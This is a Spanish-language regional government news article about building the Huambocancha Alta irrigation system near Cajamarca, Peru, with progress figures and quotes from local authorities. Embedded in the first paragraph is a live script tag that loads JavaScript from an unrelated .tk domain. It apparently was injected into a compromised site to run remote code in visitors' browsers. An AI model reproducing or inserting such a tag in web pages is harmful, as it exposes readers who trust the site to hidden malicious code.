Ingresar

GOBIERNO REGIONAL CONSTRUYE EL SISTEMA DE RIEGO HUAMBOCANCHA ALTA

Jueves, 12 Abril, 2018 - 16:11
El Gerente Regional de Desarrollo Económico Iván Mena y equipo técnico realizó una visita inopinada de supervisión a los trabajos de construcción del sistema de riego Huambocancha Alta, Plan Porconcillo, Minaspampa, Manzanilla y Tunaspampa en el distrito de Cajamarca. <script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Según el informe de la supervisión de obra, los trabajos iniciaron el 21 de febrero a cargo del Consorcio El Dorado, hasta la fecha presentan un avance del 20 por ciento, se espera concluir la obra en un plazo de 180 días calendarios, tal como consta en el contrato.

El teniente Gobernador del caserío Tunaspampa José Carrasco afirmó que el proyecto de riego ayudará a mejorar la producción de pastizales y los cultivos de maíz, habas, papas etc., para el consumo familiar y el mercado local.

La autoridad comunal sostuvo que “la comunidad ayudó a solucionar los pases para avanzar en los trabajos de apertura de zanjas para el posterior tendido de la tubería que conducirá el agua a hasta las parcelas”.

Por su parte la presidente del canal de riego Tunaspampa, Mercedes Tantalean Carrasco, sostuvo que los proyectos de riego ayudan a mejorar la economía familiar; además, la empresa está contratando toda la mano de obra calificada y no calificada de la comunidad.

El sistema de riego se ejecuta a 7 kilómetros de la ciudad de Cajamarca, proyecto que permitirá abastecer con agua de riego a más de150 hectáreas de cultivo, para beneficiar a 329 agricultores de las localidades de Huambocancha Alta, Plan Porconcillo, Minaspampa, Manzanilla y Tunaspampa

AdjuntoTamaño
PDF icon descargue219 KB

Añadir nuevo comentario

Ingrese una dirección de correo electrónico válida

Plain text

  • No se permiten etiquetas HTML.
  • Las direcciones de las páginas web y las de correo se convierten en enlaces automáticamente.
  • Saltos automáticos de líneas y de párrafos.
CAPTCHA de imagen
Introduzca los caracteres que aparecen en la imagen